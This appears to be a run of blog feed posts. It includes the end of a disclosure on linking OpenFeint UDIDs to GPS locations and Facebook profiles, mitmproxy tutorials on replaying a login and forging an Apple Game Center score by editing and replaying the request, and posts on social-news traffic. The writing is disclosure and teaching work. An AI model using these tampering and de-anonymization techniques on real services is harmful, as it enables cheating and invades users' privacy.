has opted to allow OpenFeint to use their location, latitude and longitude are returned in the profile results. This lets us trivially associate a UDID with GPS co-ordinates.</p> <p><em>The location leak was fixed by OpenFeint after my report. Although some portions of the OpenFeint API still return a user location, it seems that it is no longer served for direct profile requests.</em></p> <h2 id="linking-udids-to-facebook-profiles">Linking UDIDs to Facebook profiles</h2> <p>If the user registered a Facebook account with OpenFeint, a profile picture URL hosted by the Facebook CDN was returned in the user's profile data. Facebook profile picture URLs include the user's Facebook ID, directly linking it to their Facebook account.</p> <p>For example, here's Bruce Schneier's Facebook profile picture URL:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://profile.ak.fbcdn.net/hprofile-ak-snc4/41795_60615378024_8092_n.jpg</span></span></code></pre> <p>The 11-digit number in this URL is his Facebook user ID. We can now view his profile using a URL like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://www.facebook.com/profile.php?id=60615378024</span></span></code></pre> <p>This final step represents a complete de-anonymization of the UDID, directly linking the supposedly anonymous identifier with a user's real-world identity.</p> <p><em>The Facebook ID leak was fixed by OpenFeint after my report.</em></p> <h2 id="openfeint-s-response">OpenFeint's response</h2> <p>I reported this problem to OpenFeint on the 5th of April. I did not hear back from them immediately, but I knew they were working on the problem because their API stopped returning GPS coordinates and Facebook profile picture URLs. 
On the 12th, I received an email from Jason Citron, OpenFeint's CEO, who wanted to set up a phone conversation with me, him and an OpenFeint legal representative. We spoke on the evening of the 20th of April. I recapped my findings and expressed concern that their API still linked UDIDs to user accounts. They thanked me for the vulnerability report, confirmed that they had tightened their API in response to it, and asked for more time to consider the issue before I released anything. The following morning, it was announced that OpenFeint had been <a rel="external" href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">bought by GREE for $104 million</a>.</p> <p>Last week I received what I assume is OpenFeint's last word on the matter, in the form of an email from Jason Citron: "We will continue to pay attention to the issues you raised and will continue to adjust our practices as necessary." At the time of writing, OpenFeint's API still allows you to associate a UDID with private user information.</p> <h2 id="impact">Impact</h2> <p>Testing with a small corpus of UDIDs gathered from my own and friends' devices, I was able to link roughly 30% of UDIDs to GPS co-ordinates, 20% of users to a weak identity (e.g. OpenFeint profile picture, user-chosen account name), and 10% of UDIDs directly to a Facebook profile. I stress that my sample was small and probably unrepresentative - only OpenFeint knows what the real numbers are. 
None the less, we can make a broad guess at the magnitude of the problem, based on the fact that OpenFeint <a rel="external" href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">claims to have 75 million users</a>:</p> <ul> <li>This would mean that about 7.5 million users may have had Facebook accounts linked publicly to their UDIDs until OpenFeint stopped returning profile picture URLs a few weeks ago.</li> <li>About 22.5 million users may have had GPS co-ordinates linked publicly to their UDIDs until the issue was corrected.</li> <li>About 15 million users may still have identifying information like profile pictures and user-chosen account names (that can often be used to identify users) exposed.</li> <li>All 75 million users still have personal details like the last OpenFeint-enabled game they played and whether they are online (i.e. logged in to the OpenFeint network) exposed.</li> </ul> <p>Although the Facebook and GPS de-anonymization issues have been repaired, we have to consider the possibility that these vulnerabilities have already been used to de-anonymize a database of UDIDs.</p> <h2 id="conclusion">Conclusion</h2> <p>I want to stress that the problem here is not primarily with OpenFeint. By designing an API to expose UDIDs and encouraging developers to use it, Apple has ensured that there are literally thousands of databases linking UDIDs to sensitive user information on the net. A leak from any one of these - or worse a large-scale de-anonymization like the OpenFeint one - inevitably has serious consequences for user privacy.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>I should note that this is not quite accurate. The UDID is actually a computed value - a hash calculated over a set of identifying hardware attributes. 
In a sense, it only really exists as an API call.</p> </div> mitmproxy: A 30-second client playback example 2011-03-31T00:00:00+00:00 2011-03-31T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/tute-30-seconds/ <p><a href="https://corte.si/posts/code/mitmproxy/announce0_4/">Yesterday</a> I published version 0.4 of <a rel="external" href="http://mitmproxy.org">mitmproxy</a> - an intercepting proxy for HTTP/S traffic. The tool already has pretty complete documentation, but I've decided to write a series of less formal tutorials to showcase its abilities. Below is the first, and simplest, of these - keep an eye on the blog for more in the coming days.</p> <h2 id="a-30-second-client-playback-example">A 30-second client playback example</h2> <p>My local cafe is serviced by a rickety and unreliable wireless network, generously sponsored with ratepayers' money by our city council. After connecting, you are redirected to an SSL-protected page that prompts you for a username and password. Once you've entered your details, you are free to enjoy the intermittent dropouts, treacle-like speeds and incorrectly configured transparent proxy.</p> <p>I tend to automate this kind of thing at the first opportunity, on the theory that time spent now will be more than made up in the long run. In this case, I might use <a rel="external" href="http://getfirebug.com/">Firebug</a> to ferret out the form post parameters and target URL, then fire up an editor to write a little script using Python's <a rel="external" href="http://docs.python.org/library/urllib.html">urllib</a> to simulate a submission. That's a lot of futzing about. With mitmproxy we can do the job in literally 30 seconds, without having to worry about any of the details. Here's how.</p> <h3 id="1-run-mitmdump-to-record-our-http-conversation-to-a-file">1. 
Run mitmdump to record our HTTP conversation to a file.</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> mitmdump -w wireless-login</span></span></code></pre><h3 id="2-point-your-browser-at-the-mitmdump-instance">2. Point your browser at the mitmdump instance.</h3> <p>I use a tiny Firefox addon called <a rel="external" href="https://addons.mozilla.org/en-us/firefox/addon/toggle-proxy-51740/">Toggle Proxy</a> to switch quickly to and from mitmproxy. I'm assuming you've already <a rel="external" href="http://mitmproxy.org/doc/ssl.html">configured your browser with mitmproxy's SSL certificate authority</a>.</p> <h3 id="3-log-in-as-usual">3. Log in as usual.</h3> <p>And that's it! You now have a serialized version of the login process in the file wireless-login, and you can replay it at any time like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> mitmdump -c wireless-login</span></span></code></pre><h2 id="embellishments">Embellishments</h2> <p>We're really done at this point, but there are a couple of embellishments we could make if we wanted. I use <a rel="external" href="http://wicd.sourceforge.net/">wicd</a> to automatically join wireless networks I frequent, and it lets me specify a command to run after connecting. I used the client replay command above and voila! - totally hands-free wireless network startup.</p> <p>We might also want to prune requests that download CSS, JS, images and so forth. These add only a few moments to the time it takes to replay, but they're not really needed and I somehow feel compelled to trim them anyway. 
So, we fire up the mitmproxy console tool on our serialized conversation, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #D73A49;">&gt;</span><span> mitmproxy wireless-login</span></span></code></pre> <p>We can now go through and manually delete (using the <strong>d</strong> keyboard shortcut) everything we want to trim. When we're done, we use <strong>S</strong> to save the conversation back to the file.</p> mitmproxy: Breaking Apple's Game Center with replay 2011-03-31T00:00:00+00:00 2011-03-31T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/tute-gamecenter/ <p>This is the second in the series of tutorials I'm writing for <a rel="external" href="http://mitmproxy.org">mitmproxy</a>. You can find the first one - a 30 second tutorial on client replay - <a href="https://corte.si/posts/code/mitmproxy/tute-30-seconds/">here</a>. There will be more to come in the next few days.</p> <h2 id="the-setup">The setup</h2> <p>In this tutorial, I'm going to show you how simple it is to creatively interfere with Apple Game Center traffic using mitmproxy. To set things up, I registered my mitmproxy CA certificate with my iPhone - there's a <a rel="external" href="http://mitmproxy.org/doc/certinstall/ios.html">step by step set of instructions</a> for doing this in the mitmproxy docs. I then started mitmproxy on my desktop, and configured the iPhone to use it as a proxy.</p> <h2 id="taking-a-look-at-the-game-center-traffic">Taking a look at the Game Center traffic</h2> <p>Let's take a first look at the Game Center traffic. 
The game I'll use in this tutorial is <a rel="external" href="http://itunes.apple.com/us/app/super-mega-worm/id388541990?mt=8">Super Mega Worm</a> - a great little retro-apocalyptic sidescroller for the iPhone:</p> <div class="media"> <a href="supermega.png"> <img src="supermega.png" /> </a> </div> <p>After finishing a game (take your time), watch the traffic flowing through mitmproxy:</p> <div class="media"> <a href="one.png"> <img src="one.png" /> </a> </div> <p>We see a bunch of things we might expect - initialisation, the retrieval of leaderboards and so forth. Then, right at the end, there's a POST to this tantalising URL:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>https://service.gc.apple.com/WebObjects/GKGameStatsService.woa/wa/submitScore</span></span></code></pre> <p>The contents of the submission are particularly interesting:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">plist</span><span style="color: #6F42C1;"> version</span><span>=</span><span style="color: #032F62;">&quot;1.0&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;category&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">string</span><span>&gt;SMW_Adv_USA1&lt;/</span><span style="color: #22863A;">string</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;score-value&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: 
#22863A;">integer</span><span>&gt;55&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;timestamp&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;1301553284461&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">plist</span><span>&gt;</span></span></code></pre> <p>This is a <a rel="external" href="http://en.wikipedia.org/wiki/Property_list">property list</a>, containing an identifier for the game, a score (55, in this case), and a timestamp. Looks pretty simple to mess with.</p> <h2 id="modifying-and-replaying-the-score-submission">Modifying and replaying the score submission</h2> <p>Let's edit the score submission. First, select it in mitmproxy, then press <strong>enter</strong> to view it. Make sure you're viewing the request, not the response - you can use <strong>tab</strong> to flick between the two. Now press <strong>e</strong> for edit. You'll be prompted for the part of the request you want to change - press <strong>b</strong> for body. Your preferred editor (taken from the EDITOR environment variable) will now fire up. 
Let's bump the score up to something a bit more ambitious:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">plist</span><span style="color: #6F42C1;"> version</span><span>=</span><span style="color: #032F62;">&quot;1.0&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;category&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">string</span><span>&gt;SMW_Adv_USA1&lt;/</span><span style="color: #22863A;">string</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;score-value&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;2200272667&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">key</span><span>&gt;timestamp&lt;/</span><span style="color: #22863A;">key</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">integer</span><span>&gt;1301553284461&lt;/</span><span style="color: #22863A;">integer</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">dict</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">plist</span><span>&gt;</span></span></code></pre> <p>Save the file and exit your editor.</p> <p>The final step is to replay this modified request. 
Simply press <strong>r</strong> for replay.</p> <h2 id="the-glorious-result-and-some-intrigue">The glorious result and some intrigue</h2> <div class="media"> <a href="leaderboard.png"> <img src="leaderboard.png" /> </a> </div> <p>And that's it - according to the records, I am the greatest Super Mega Worm player of all time.</p> <p>Curiously, the top competitors' scores are all the same: 2,147,483,647. If you think that number seems familiar, you're right: it's 2^31-1, the maximum value you can fit into a signed 32-bit int. Now let me tell you another peculiar thing about Super Mega Worm - at the end of every game, it submits your highest previous score to the Game Center, not your current score. This means that it stores your highscore somewhere, and I'm guessing that it reads that stored score back into a signed integer. So, if you <em>were</em> to cheat by the relatively pedestrian means of modifying the saved score on your jailbroken phone, then 2^31-1 might well be the maximum score you could get. Then again, if the game itself stores its score in a signed 32-bit int, you could get the same score through perfect play, effectively beating the game. So, which is it in this case? I'll leave that for you to decide.</p> mitmproxy 0.4 has been released 2011-03-30T00:00:00+00:00 2011-03-30T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_4/ <div class="media"> <a href="..&#x2F;mitmproxy_0_4.png"> <img src="..&#x2F;mitmproxy_0_4.png" /> </a> </div> <p>I've just tagged and released mitmproxy 0.4. You can download it from the new project website:</p> <h2 id="mitmproxy-org"><a rel="external" href="http://mitmproxy.org">mitmproxy.org</a></h2> <p>This is a huge update, with dozens of new features, and improvements to almost every aspect of the project. 
A few highlights are:</p> <ul> <li>Complete serialization of HTTP/S conversations</li> <li>On-the-fly generation of SSL interception certificates</li> <li>Ability to replay both the client and the server side of HTTP/S conversations</li> <li>mitmdump has grown up to be a powerful tcpdump-like commandline tool for HTTP/S</li> <li>Scripting hooks for programmatic modification of traffic using Python</li> <li>Many, many user interface improvements, bug fixes, and minor features</li> <li>Better <a rel="external" href="http://mitmproxy.org/doc/index.html">documentation</a>.</li> </ul> <p>Special thanks go to <a rel="external" href="http://www.henriknordstrom.net/">Henrik Nordström</a> for many great contributions to this release. I'd love more contributors to join the project - if you feel like hacking on mitmproxy, take a look at the <a rel="external" href="https://github.com/cortesi/mitmproxy/blob/master/todo">todo</a> file at the top of the tree for ideas.</p> <p>Over the next week I will write a series of tutorials to showcase mitmproxy's abilities, ranging from simple to quite complex. Keep an eye on the blog for these - they will be published here first, before making their way into the official documentation.</p> Social news eats a blog post 2011-01-24T00:00:00+00:00 2011-01-24T00:00:00+00:00 https://corte.si/posts/socialmedia/post-lifecycle/ <p>This is the second post in which I try to add some data to my nagging doubts about the technical news ecosystem. In my <a href="https://corte.si/posts/socialmedia/redditgraph/">previous post</a>, I showed off a visualisation of how the proggit front page changes over time. In this post, I take a look at the flip-side of the coin - what happens to a specific post as it passes through the short, fickle social news cycle? 
To do this, I'll take a deep dive into my own server logs, looking at a <a href="https://corte.si/posts/code/cyclesort/">recent post of mine</a> that appeared briefly on both <a rel="external" href="http://news.ycombinator.com">Hacker News</a> and <a rel="external" href="http://www.reddit.com/r/programming">proggit</a>. I'd guess that nearly all posts follow more or less the same trajectory as they are extruded through the social news mill, so this should be interesting to more people than just me. At the risk of making things a bit dry and descriptive, I'm saving speculation and interpretation for a future post.</p> <p>The scene is set at about 10pm New Zealand time, when I put the finishing touches to my blog post, and fire off an rsync up to my server. I quickly double-check that the blog and the RSS feed have updated OK, <a rel="external" href="http://twitter.com/cortesi/status/6627667512131584">tweet a link</a> to the post, and go to bed. While I sleep, the post creeps onto both Hacker News and proggit, ultimately getting 41000 hits over the next 5 days or so. The graphs below show only the first 50 hours of the post's lifetime - everything after that is just a long, slow dénouement as it dwindles into obscurity.</p> <h2 id="our-real-time-robot-overlords">Our real-time robot overlords</h2> <p>The action starts almost as soon as I click the "tweet" button. Within seconds, the post is retrieved by Twitterbot. One second later, Googlebot appears, and almost simultaneously I get hit by Jaxified, Njuice, LinkedIn and PostRank. In all, 10 bots read my blog post within the first minute, handily beating the first human, who slouches lethargically into view at a tardy 90 seconds.</p> <p>Below is a list of the bots that retrieved my post before the first submission to a social news site. These are the realtime robots, presumably hoovering up the Twitter firehose and indexing all the links they find. 
The cast of characters is a mixture of the expected big fish, stealth startups, and skunkworks projects at well-known companies. Bot identity was gleaned from HTTP <a rel="external" href="http://en.wikipedia.org/wiki/User_agent">user-agent</a> headers when they were provided, or by checking the ownership of the responsible IP through reverse DNS resolution and whois lookups when they weren't. Most of the real-time bots were well behaved, identifying themselves clearly with a URL in the user-agent string.</p> <style> .soctable td { padding-left: 0 !important; } </style> <table class="soctable"> <tr> <th>minutes after publication</th> <th>bot</th> </tr> <tr> <td rowspan="10">1</td> <td><a href="http://twitter.com">Twitter</a></td> </tr> <tr> <td><a href="http://www.google.com/bot.html">Google</a></td> </tr> <tr> <td><a href="http://www.jaxified.com/crawler">Jaxified</a></td> </tr> <tr> <td><a href="http://njuice.com/">NJuice</a></td> </tr> <tr> <td><a href="http://www.linkedin.com">LinkedIn</a></td> </tr> <tr> <td><a href="http://www.postrank.com/">PostRank</a></td> </tr> <tr> <td>Unidentified bot from a Microsoft-owned IP</td> </tr> <tr> <td><a href="http://help.yahoo.com/help/us/ysearch/slurp">Yahoo! Slurp</a></td> </tr> <tr> <td>Unidentified bot from a <a href="http://www.bbc.co.uk/blogs/rad/">BBC RAD labs</a> IP. </td> </tr> <tr> <td><a href="http://www.oneriot.com/">OneRiot</a></td> </tr> <tr> <td rowspan="4">2</td> <td><a href="http://friendfeed.com/about/bot">FriendFeed</a></td> </tr> <tr> <td><a href="http://www.kosmix.com/">Kosmix</a></td> </tr> <tr> <td><a href="http://labs.topsy.com/butterfly/">Topsy Butterfly</a></td> </tr> <tr> <td>Unidentified bot from <a href="http://marban.com">marban.com</a> subdomain. 
(PoPUrls?)</td> </tr> <tr> <td rowspan="2">3</td> <td><a href="http://metauri.com/">metauri.com</a></td> </tr> <tr> <td><a href="http://search.msn.com/msnbot.htm">msnbot</a></td> </tr> <tr> <td rowspan="2">6</td> <td><a href="http://summify.com">Summify</a></td> </tr> <tr> <td>Bot identifying itself just as "NING", can't confirm that it's <a href="http://www.ning.com/">the Ning</a>. </td> </tr> <tr> <td>9</td> <td><a href="http://tineye.com/crawler.html">tineye</a></td> </tr> <tr> <td>26</td> <td><a href="http://spinn3r.com/robot">spinn3r.com</a></td> </tr> <tr> <td>27</td> <td><a href="http://www.backtype.com/">backtype.com</a></td> </tr> <tr> <td>47</td> <td><a href="http://www.facebook.com/externalhit_uatext.php">facebookexternalhit</a></td> </tr> </table> <h2 id="enter-the-heavyweights-hacker-news-and-reddit">Enter the heavyweights: Hacker News and Reddit</h2> <p>48 minutes after the post was published, the first hit from a social news site appears: hello <a href="http://news.ycombinator.com">Hacker News</a>. The post quickly makes it onto the front page, and HN traffic peaks at 399 hits per hour in the second hour after publication. All told, the post got 2337 hits with a HN <a rel="external" href="http://en.wikipedia.org/wiki/HTTP_referrer">referrer header</a>.</p> <div class="media"> <a href="ycombinator.png"> <img src="ycombinator.png" /> </a> <div class="subtitle"> news.ycombinator.com </div> </div> <p>Two hours and three minutes after publication, the real monster of social news arrives: the first hit from Reddit appears. The Reddit traffic peaks in the sixth hour after publication at 3025 hits per hour, and delivers a total of 23807 hits in the 51 hours after publication.</p> <div class="media"> <a href="reddit.png"> <img src="reddit.png" /> </a> <div class="subtitle"> reddit.com/r/programming </div> </div><h2 id="the-long-tail">The long tail</h2> <p>Reddit accounted for the vast majority of the post's traffic, dwarfing all other sources combined. 
In all, I received only 2300 hits with specified referrer headers that weren't Reddit or HN. Here are all the referrers that were responsible for more than 10 hits to the post:</p> <table> <tr><th>hits</th><th>site</th></tr> <tr><th>456</th> <td><a href="http://popurls.com">popurls.com</a></td></tr> <tr><th>359</th> <td><a href="http://www.google.com/reader">Google Reader</a></td></tr> <tr><th>282</th> <td><a href="http://twitter.com">Twitter</a></td></tr> <tr><th>196</th> <td><a href="http://jimmyr.com">jimmyr.com</a></td></tr> <tr><th>183</th> <td><a href="http://delicious.com">delicious</a></td></tr> <tr><th>153</th> <td><a href="http://pop.is">pop.is</a></td></tr> <tr><th>139</th> <td><a href="http://www.google.com">Google Search</a></td></tr> <tr><th>82</th> <td><a href="http://www.wired.com">wired.com</a></td></tr> <tr><th>56</th> <td><a href="http://www.facebook.com">Facebook</a></td></tr> <tr><th>36</th> <td><a href="http://longurl.com">longurl.com</a></td></tr> <tr><th>36</th> <td><a href="http://glozer.net/trendy">glozer.net/trendy</a></td></tr> <tr><th>30</th> <td><a href="http://oursignal.com">oursignal.com</a></td></tr> <tr><th>28</th> <td><a href="http://hackurls.com">hackurls.com</a></td></tr> <tr><th>24</th> <td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td></tr> <tr><th>18</th> <td><a href="http://www.netvibes.com">www.netvibes.com</a></td></tr> <tr><th>15</th> <td><a href="http://dzone.com">dzone.com</a></td></tr> <tr><th>11</th> <td><a href="http://www.freshnews.com">www.freshnews.org</a></td></tr> </table> <p>It's interesting to see that I got nearly 200 hits from delicious.com. By contrast, <a rel="external" href="http://pinboard.in">pinboard.in</a> - which seems to be delicious.com's anointed successor - sent me only two hits. 
Then again, my post was published in late November 2010, about a month before Yahoo <a rel="external" href="http://techcrunch.com/2010/12/16/is-yahoo-shutting-down-del-icio-us/">spectacularly hobbled</a> their bookmarking property. I wonder what those figures would look like today.</p> <p>The thin end of the long tail is the 200 hits from 94 sites that were responsible for 10 or fewer hits each. We can break this motley crew up into a few different classes:</p> <ul> <li>Sites that provide some sort of social news analysis, piggy-backing off HN, Reddit and delicious.com. For example, <a rel="external" href="http://popacular.com">popacular.com</a>, <a rel="external" href="http://seesmic.com">seesmic.com</a>, <a rel="external" href="http://hotgrog.com">hotgrog.com</a>.</li> <li>URL shorteners like <a rel="external" href="http://j.mp">j.mp</a> and unshorteners like <a rel="external" href="http://untiny.me">untiny.me</a></li> <li>Social media-ish services like <a rel="external" href="http://friendfeed.com">FriendFeed</a>, <a rel="external" href="http://stumbleupon.com">StumbleUpon</a>, <a rel="external" href="http://pinboard.in">pinboard.in</a></li> <li>Tiny personal blogs.</li> <li>And, surprisingly - a number of sites that just provide an alternative interface or URL for Hacker News: <a rel="external" href="http://hackerne.ws/">hackerne.ws</a>, <a rel="external" href="http://ihackernews.com/">ihackernews.com</a>, <a rel="external" href="http://hacker-newspaper.gilesb.com/">hacker-newspaper.gilesb.com</a>, <a rel="external" href="http://www.icombinator.net/">www.icombinator.net</a>.</li> </ul> <h2 id="robot-scavengers-of-the-social-news-ecosphere">Robot scavengers of the social news ecosphere</h2> <p>Let's take a look at overall bot traffic, separating out our silicon friends by looking for non-human and non-standard user-agent headers. 
The moment the post hits the HN front page bot traffic spikes, and this spike continues as the post is submitted to Reddit and starts its climb up the proggit front page.</p> <div class="media"> <a href="robots.png"> <img src="robots.png" /> </a> <div class="subtitle"> robots </div> </div> <p>Enter the robot scavengers of the social news ecosphere - a set of second-tier aggregators that monitor social news and Twitter for hot stories. Here's a sample of bot visitors, taken more or less at random from the logs:</p> <table> <tr><td><a href="http://inagist.com">inagist.com</a></td> <td><a href="http://www.netvibes.com">www.netvibes.com</a></td> <td><a href="http://chattertrap.com">chattertrap.com</a></td> <td><a href="http://twingly.com">twingly.com</a></td></tr> <tr><td><a href="http://coder.io">coder.io</a></td> <td><a href="http://newsmagpie.com">newsmagpie.com</a></td> <td><a href="http://worio.com">worio.com</a></td> <td><a href="http://www.myvbo.com">www.myvbo.com</a></td></tr> <tr><td><a href="http://www.zemanta.com">www.zemanta.com</a></td> <td><a href="http://embed.ly">embed.ly</a></td> <td><a href="http://brandwatch.net">brandwatch.net</a></td> <td><a href="http://www.flipboard.com">www.flipboard.com</a></td></tr> <tr><td><a href="http://paper.li">paper.li</a></td> <td><a href="http://rivva.de">rivva.de</a></td> <td><a href="http://attribyte.com">attribyte.com</a></td> <td><a href="http://diffbot.com">diffbot.com</a></td></tr> <tr><td><a href="http://yoono.com">yoono.com</a></td> <td><a href="http://hatena.net.jp">hatena.net.jp</a></td> <td><a href="http://hourlypress.com">hourlypress.com</a></td> <td><a href="http://longurl.org">longurl.org</a></td></tr> <tr><td><a href="http://untiny.me">untiny.me</a></td> <td><a href="http://goo.ne.jp">goo.ne.jp</a></td> <td><a href="http://www.baidu.com">www.baidu.com</a></td> <td><a href="http://sharethis.com">sharethis.com</a></td></tr> <tr><td><a href="http://ideashower.com">ideashower.com</a></td> <td><a 
href="http://pannous.info">pannous.info</a></td> <td><a href="http://wikiwix.com">wikiwix.com</a></td> <td><a href="http://pipes.yahoo.com">pipes.yahoo.com</a></td></tr> <tr><td><a href="http://mustexist.com">mustexist.com</a></td> <td><a href="http://pics.fefoo.com">pics.fefoo.com</a></td> <td><a href="http://cyber.law.harvard.edu">cyber.law.harvard.edu</a></td> <td><a href="http://seatgeek.com">seatgeek.com</a></td></tr> <tr><td><a href="http://metadatalabs.com">metadatalabs.com</a></td> <td><a href="http://moreover.com">moreover.com</a></td> <td><a href="http://thinglabs.com">thinglabs.com</a></td> <td><a href="http://stufftotweet.com">stufftotweet.com</a></td></tr> <tr> <td><a href="http://chilitweets.com">chilitweets.com</a></td> <td><a href="http://bkluster.hut.edu.vn">bkluster.hut.edu.vn</a></td> <td><a href="http://wikio.com">wikio.com</a></td> <td><a href="http://pipes.yahoo.com">Yahoo Pipes</a></td> </tr> <tr> <td><a href="http://zite.com">zite.com</a></td> <td><a href="http://zelist.ro">zelist.ro</a></td> <td><a href="http://buzzzy.com">buzzzy.com</a></td> <td><a href="http://intravnews.com">intravnews.com</a></td> </tr> </table> <p>At this point, I'd like to bitch a bit about how astonishingly badly behaved some of the automated systems skulking around today's web are. The vast, vast majority don't provide any clue about the responsible entity in the user-agent string. The list above consists of responsible bots that do identify themselves, and less responsible ones that I could identify through reverse domain resolution. Most of the irresponsible bots come from Amazon Web Services, which seems to be a right wretched hive of scum and villainy. The worst performers here boggle the mind - about a dozen hosts from AWS retrieved the blog post more than 200 times a day, all using full GET requests, without an If-Modified-Since header, and with no identification. 
The arch-villain hit the post 600 times in its first 24 hours - that's about once every 2.5 minutes.</p> <h2 id="referrer-less-viewers-and-stealthy-bots">Referrer-less viewers and stealthy bots</h2> <p>I was surprised to see that almost 20% of requests not identified as bot requests had no specified referrer, a much greater percentage than I would have anticipated. Here's a graph showing the number of referrer-less requests per hour:</p> <div class="media"> <a href="noreferrer.png"> <img src="noreferrer.png" /> </a> <div class="subtitle"> requests without a referrer </div> </div> <p>It looks like the double-peak in this graph coincides with the traffic peaks from HN and Reddit. This suggests that the majority of these hits do in fact come (perhaps indirectly) from HN and Reddit users. One possibility is that a chunk of this referrer-less traffic comes from non-browser Twitter clients.</p> <p>A fraction of the referrer-less traffic also comes from stealthy bots sending user-agent strings that match those of desktop browsers. About 5% of these requests, for example, come from the Amazon EC2 cloud, so are unlikely to be real browsers. One Internet darling that does this is Instapaper, which seems to use the requesting client's user-agent string rather than frankly confessing itself to be a bot. It also appears to re-request an article in full for each user, rather than simply checking if there's been a change and using a cached copy. On the upside, this means that I know that 131 readers used Instapaper to view my post.</p> <h2 id="aftermath">Aftermath</h2> <p>After the post drifts off the proggit and HN front pages, traffic dies down. There's a dwindling tail of stragglers that bothered to flip through to the second or third page of top stories, and a tiny dribble of users who discovered the link through other sources. A month later, the post gets about 60 hits per day, of which more than a third are from bots. 
Non-bot traffic is still dominated by Reddit, presumably from people searching or idly flicking through Reddit's history.</p> <p>So, in the end, after my once-thrumming server quiets down, what has the lasting effect been on my own social graph? I had a small surge of Twitter follows, going from 230 to 245 followers. There was a minor blip of subscribers to my RSS feed, with Google Reader reporting subscriptions going from about 510 to 551. Out of 33,000 unique visitors 56 decided to cultivate a more permanent relationship of some sort to my blog. That's 1 in 600. If you remember only one figure from this post, this should be it.</p> A journey through the bowels of proggit 2011-01-12T00:00:00+00:00 2011-01-12T00:00:00+00:00 https://corte.si/posts/socialmedia/redditgraph/ <div class="media"> <a href="proggit4.png"> <img src="proggit4.png" /> </a> <div class="subtitle"> proggit - 4 hours </div> </div> <p>I've had a nagging sense of dissatisfaction with my information diet lately, and it's becoming clear that over-reliance on social news sites like Reddit and Hacker News (much as I love them) lies at the heart of my discontent. For the past few months, I've been gathering data to help me come up with a coherent explanation for my malaise. I'm still working on it, so this post will have no conclusions, only repulsive metaphors and pretty pictures.</p> <p>For a week or so in November I logged the slow, peristaltic progress of stories through the bowels of <a rel="external" href="http://www.reddit.com/r/programming">proggit</a>, watching them get nudged this way and that by the malodorous, hot gas of public opinion before finally being shunted on to the colon of the second page of results. In other words, I sampled the top 25 stories every 5 minutes through the RSS feed. 
One of the things I was interested in was how submission rankings changed over time, so I visualised the dataset using the same technique I came up with to <a rel="external" href="http://sortvis.org">visualise sorting algorithms</a>. The image above shows 4 hours of proggit, with each submission represented by a line. The lines are coloured based on the average rank the story achieves over its lifetime in the top 25, ranging between upvote orange for top stories, and downvote blue for bottom stories.</p> <p>Here's a bigger sample - 72 hours of data embedded in a widget to let you zoom and pan around. The busy cut-and-thrust of life on reddit is all here. The meteoric rise, inevitably followed by long, slow decay. The sudden, mysterious, mid-flight disappearances. The jostling and writhing among the bottom submissions that never quite manage to make it into the big leagues. Heady stuff. Click to view:</p> <div class="media"> <a href="proggit72.png"> <img src="mini72.png" /> </a> <div class="subtitle"> proggit - 72 hours </div> </div> <p>Perhaps I'll do an expanded version that lets you view submission titles, times and so forth later on.</p> Cyclesort - a curious little sorting algorithm 2010-11-22T00:00:00+00:00 2010-11-22T00:00:00+00:00 